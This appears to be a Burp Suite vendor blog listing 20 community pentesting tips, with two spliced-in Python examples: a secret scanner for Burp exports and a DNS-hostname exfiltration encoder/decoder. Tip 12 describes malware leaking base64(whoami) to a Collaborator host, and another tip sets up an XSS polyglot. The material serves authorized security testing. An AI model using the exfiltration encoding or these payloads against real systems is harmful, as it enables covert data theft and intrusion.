20 Burp Suite tips from the Burp user community | Blog

The Burp Suite user community can best be described as passionate, devoted, and extremely invested in the growth of our product. That's why we love it when our users take it upon themselves to quiz one another and uncover new and exciting ways to make Burp Suite work for them.

Long-time Burp Suite Professional user Michael Skelton, better known as @codingo_, ran a hugely informative Twitter thread asking users for their best tips and tricks. We trawled the results and wanted to share our favorites with you all.

Time saving tips

One of the biggest superpowers that a pentester, or any kind of infosec professional for that matter, can wield is the ability to save time. Automating manual processes, creating command repeats, or even just generating default project options: anything that frees up your time to deep-dive the juicy stuff counts as a win in our book.

1. "When you're playing with a parameter in the Repeater tab and its value gets reflected in the response, you can enable this toggle when you have to scroll to see what has changed... a real time saver!" @sw33tLie

2. "Build a default_project_options.json to avoid repeating the same config over and over. Like the regex on advanced scope definition, timeouts, proxy or intercept config, match and replace, history filter or ssl_pass_through. Just set a target and start hunting immediately!" @Six2dez1

3. "From Proxy > HTTP History: Ctrl + R (send the request to Repeater), Ctrl + Shift + R (jump to Repeater), Ctrl + Space (send the request from Repeater). It saves my mouse time :) Learnt by navigating 'User options > Misc > Hotkeys'" @rashedul_css

4. "You can change the default Intruder payload list. Set your custom one and it will be a time saver." @fuxksniper

5. "In search, tick 'negative' matches to filter out all responses/requests that contain strings that you don't want to see, for example 'incap_sess'. This is a quick way, other than using other methods." @yappare

Discovery techniques

Naturally, you'll have taken all of the time-saving tips above on board, so you'll be needing something to fill up all that free time, right? Lucky for you, the Burp Suite community is all hands on deck when it comes to discovery. Advice on traffic filtering, post listening, server abnormalities, script creation, Collaborator polling, and much, much more...

6. "Shout out to @LaNMaSteR53 for showing us this during his training: tools/target/site-map/comparing" @pirateducky

7. "When using extensions is too much, use the old compare site map to test for access control issues && exclude logout/login/delete etc. from scope && (cookie jar when it only uses cookies || another chained Burp to replace required tokens/CSRF/headers with another user's)." @irsdl

8. "Use the Advanced scope option to just use the name of the website/company. That way I can filter our traffic + this also helps to see in case there's an S3 bucket or any other cloud storage being used under the company/domain's name!" @imhaxormad

9. "Starting multiple local proxy listeners on separate ports for various tools. That way you can filter your views by port and see exactly how the tools behave and what (undiscovered) abnormalities they might trigger on the server." @rauschecker

10. "Match & replace FALSE2TRUE, most of the time it gives some interesting behaviours :)" @sudhanshur705

11. "Save the Burp project to file and use gf patterns against it for hunting sensitive stuff like keys, tokens, etc. Kind of a passive approach for hunting in JS files for secrets." @admiralgaust
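As an added example (not from the tweet above, nor PortSwigger's or gf's own code), here is the same idea done offline in Python: parse a Burp "Save items" XML export, base64-decode each request and response, and run a few secret-style regexes over them. It assumes the XML export rather than the binary .burp project file, since grep-style patterns only work on decoded text; the three patterns are my own selection, not gf's rule files, and the sample export, the key "AKIAIOSFODNN7EXAMPLE" (AWS's documented placeholder) and the JWT are constructed test data.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Hypothetical pattern set in the spirit of gf "secrets" rules; written for this example.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"),
    "generic_api_key": re.compile(r"""(?i)\bapi[_-]?key["']?\s*[:=]\s*["']([A-Za-z0-9_\-]{16,})["']"""),
}


def _decode(elem):
    """Text of a <request>/<response> element; Burp marks bodies with base64="true"."""
    if elem is None or elem.text is None:
        return ""
    if elem.get("base64") == "true":
        return base64.b64decode(elem.text).decode("utf-8", errors="replace")
    return elem.text


def find_secrets(items_xml: str):
    """Return (url, part, pattern_name, token) for every match in a Save-items export."""
    findings = []
    root = ET.fromstring(items_xml)
    for item in root.iter("item"):
        url = item.findtext("url", default="")
        for part in ("request", "response"):
            body = _decode(item.find(part))
            for name, pattern in SECRET_PATTERNS.items():
                for m in pattern.finditer(body):
                    token = m.group(1) if m.groups() else m.group(0)
                    findings.append((url, part, name, token))
    return findings


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample export: one item, request carries a JWT, response JS carries keys.
SAMPLE_REQUEST = (
    "GET /static/app.js HTTP/1.1\r\nHost: example.com\r\n"
    "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\n"
    'var apiKey = "abcdefghijklmnop1234";\n'
    'var aws = "AKIAIOSFODNN7EXAMPLE";\n'
)
SAMPLE_ITEMS_XML = f"""<?xml version="1.0"?>
<items>
  <item>
    <url><![CDATA[https://example.com/static/app.js]]></url>
    <request base64="true"><![CDATA[{_b64(SAMPLE_REQUEST)}]]></request>
    <response base64="true"><![CDATA[{_b64(SAMPLE_RESPONSE)}]]></response>
  </item>
</items>
"""

if __name__ == "__main__":
    for url, part, name, token in find_secrets(SAMPLE_ITEMS_XML):
        print(f"{name:20} {part:8} {url}  {token}")
```

Point it at a real export with `find_secrets(open("items.xml").read())`; scoping the export to in-scope items first keeps the file small, and a hit is a lead to verify by hand, not a finding on its own.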

12. "Persistent access to Collaborator sessions: https://onsecurity.io/blog/persistent-access-to-burp-suite-sessions-step-by-step-guide/ With the 'SECRET_KEY', you can create scripts and poll the Collaborator and do whatever you want with the results. E.g. 1. malware -> base64(whoami).burpcollaborator.com 2. Poll -> get the requested subdomain -> B64decode" @gweeperx
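The encode-then-poll-then-decode loop in the tip, as an added Python example (my code, not the tweet's scripts, PortSwigger's, or the linked guide's). The Collaborator domain is a constructed placeholder, and the interaction records are a deliberately simplified shape, not the real polling endpoint's JSON. The example goes one step past the tip: it encodes with base32 and chunks into 63-character labels, because base64's `+`, `/`, `=` are not legal hostname characters and DNS is case-insensitive, so a mixed-case base64 label may not survive a resolver; a decoder for plain base64 labels, as the tip uses, is included with that caveat.

```python
import base64

# Assumed Collaborator payload domain; constructed placeholder, not a real one.
COLLAB_DOMAIN = "abc123.burpcollaborator.net"
MAX_LABEL = 63   # RFC 1035: a DNS label is at most 63 octets
MAX_NAME = 253   # RFC 1035: practical maximum length of a full name


def encode_exfil_hostname(data: bytes, domain: str = COLLAB_DOMAIN) -> str:
    """Hostname a payload would resolve to leak `data` (base32, padding stripped, lowercase)."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    host = ".".join(labels + [domain])
    if len(host) > MAX_NAME:
        raise ValueError("payload too long for one name; split it across several queries")
    return host


def decode_exfil_hostname(host: str, domain: str = COLLAB_DOMAIN) -> bytes:
    """Recover the leaked bytes from a queried name, tolerating case changes and a trailing dot."""
    host = host.rstrip(".").lower()
    suffix = "." + domain.lower()
    if not host.endswith(suffix):
        raise ValueError(f"{host!r} is not under {domain}")
    payload = host[:-len(suffix)].replace(".", "").upper()
    payload += "=" * (-len(payload) % 8)          # base32 pads to 8-char groups
    return base64.b32decode(payload)


def decode_base64_label(label: str) -> bytes:
    """Decode a base64/base64url label as in the tip (padding restored).

    Caveat: if any hop lowercased the query, this yields garbage; base32 avoids that.
    """
    label = label.replace("-", "+").replace("_", "/")
    label += "=" * (-len(label) % 4)
    return base64.b64decode(label)


def decode_interactions(interactions, domain: str = COLLAB_DOMAIN):
    """Walk polled interaction records and decode every DNS query under our domain."""
    out = []
    for rec in interactions:
        if rec.get("protocol") != "dns":
            continue
        try:
            out.append((rec["query"], decode_exfil_hostname(rec["query"], domain)))
        except ValueError:            # noise, or a query not under our domain
            continue
    return out


# Constructed records standing in for polled interactions (simplified shape, not Burp's JSON).
SAMPLE_INTERACTIONS = [
    {"protocol": "dns", "query": encode_exfil_hostname(b"root\n")},   # base32(whoami output)
    {"protocol": "http", "query": COLLAB_DOMAIN},
    {"protocol": "dns", "query": "unrelated.example.net"},
]

if __name__ == "__main__":
    for query, data in decode_interactions(SAMPLE_INTERACTIONS):
        print(query, "->", data)
    print(decode_base64_label("cm9vdAo"))   # the tip's base64 form of "root\n", minus padding
```

Payloads longer than roughly 180 bytes will not fit in one name; send them as several queries with a sequence number in the first label and reassemble on the polling side.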

13. "I admit I use 'copy as curl' for non-pentesting purposes... It's super handy to add as a POC for engineers to fix a bug when they don't have Burp." @Blue_CanaryBE

14. "For me the Match and Replace function was a gem. I use it for many functionalities, e.g. adding cache poisoning related headers like X-Forwarded-Host: unique_string. After that I'll search for the unique_string in Logger++ responses to see if it is reflecting anywhere." @0xlrfan

15. "Add irrelevant, noisy hosts to the SSL pass-through list so the state will be smaller and you don't get distracted when looking at the history tab. Also you don't have to forward irrelevant requests/responses while intercepting. Especially in mobile app testing." @Mustafaran

Productivity and workflow tips

Being familiar with Burp Suite is one thing, but knowing lightning-fast shortcuts and rapid-fire ways to get at the information you need more quickly? That's something we'll never tire of learning about. Our users have covered everything from keyboard shortcuts to naming conventions here, and it's all going to contribute to improving your workflows and getting results faster.

16. "This probably isn't a tip or a trick but I think I learnt this from @InsiderPhD if I'm not wrong. It's basically renaming the Repeater tabs in Repeater. I do this for every important endpoint I visit and this works wonders when you have so many tabs open." @thebinarybot

17. "There are two previous (<) & next (>) tabs on top of Repeater. I didn't know that; I learned it from stok's interview with nahamsec I guess.... :)" @sidparmarr

18. "Always save a copy of the project file at the end with the in-scope items only, to reduce the project file size. Then 7zip is the best format to compress it heavily." @irsdl

19. "Match and replace with XSS polyglots... add XSS1="'--> and every time that you write XSS1 while browsing it will be replaced. Thanks to @SamuelAnttila!!"

20. "Sending requests to Burp on my local machine from my VPS via various tools (which have a proxy option) using "ssh -R 18081:localhost:8081" when logging on. I add a proxy listener for 127.0.0.1:8081 to Burp for this so I can easily filter between local machine and VPS traffic." @xnl_h4ck3r

Anything we've missed?

Huge thanks go out to Michael Skelton for starting this thread off, and of course to all of the incredible members of the Burp Suite community for sharing their tips and tricks. If you have any other advice to share, or any questions you want answered, make sure to post them to our Twitter account using the hashtag BurpSuiteTips. Happy Burping everyone!
